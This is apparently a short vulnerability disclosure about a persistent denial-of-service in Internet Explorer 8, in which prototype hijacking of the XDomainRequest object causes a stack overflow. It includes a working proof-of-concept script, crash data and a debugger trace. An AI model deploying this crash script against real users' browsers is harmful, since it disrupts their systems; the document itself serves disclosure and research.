Internet Explorer 8 XDR Persistent DOS.
Publicated on : 1206887950Abstract.
Internet Explorer 8 is vulnerable to prototype hijacking c.q. function aliasing on the XDR object. The XDomainRequest object is a new feature in Internet Explorer that allows cross domain XML calls. By default the feature only allows cross domain calls when both parties agree upon the made request, this involves XDomainRequestAllowed to be appended to the response header from the host in question, to which the request was made. Since this is a very dangerous object, I went on to explore this new feature in order to review it's security aspect a little more. It didn't take long to find a serious issue regarding prototype hijacking on the XDomainRequest object which leads to a denial of service due to a stack overflow which only can be recovered from after a full OS re-boot. The reason why it is vulnerable is due to a the feature in Internet Explorer that tries to re-create a session window when a window crashes. This happens automatically without user interference, and therefore the denial of service will be persistent.
The problem.
It is almost similar to prototype hijacking first described by Stefano Di Paola on xmlhttprequests back in 2006.[1] with the difference that it triggers a denial of service instead of a hijacked request. I create a function that instantiate a new XDR object every time the 'xdr' variable is called. Which I think leads to function aliasing. Obviously Internet Explorer chokes on it, and crashes the window we work in. Then Internet Explorer tries to re-open the window, see figure 1.
Figure 1.
As seen in figure 2, trying to shut down iexplore.exe in the Windows task manager results in a new browser being launched that re-creates the window session, after killing it, Internet Explorer instantiates a new browser and hangs again, and so on.
Figure 2.
It almost behaves like a Trojan which cannot be killed :)
The attack vector.
<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
XDomainRequest = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
Crash data:
AppName: iexplore.exe AppVer: 8.0.6001.17184 ModName: ieframe.dll
ModVer: 8.0.6001.17184 Offset: 0003f8cb
In figure 3 I am performing a live trace on ieframe.dll with Auto-Debug to see what happened. The live trace involves MSIE booting, resizing the window and navigating, and launching the exploit. Thread 000001F0 shows the exploit executing which results in a stack overflow.
Figure 3.
Conclusion.
More research is needed on this XDR object to fully grasp the risk of this new feature. The given attack and PoC was performed with browserfry.[2] and results may vary.
References:
[1] Subverting Ajax - http://www.wisec.it/docs.php?id=4 (PDF file)
[2] http://browserfry.0x000000.com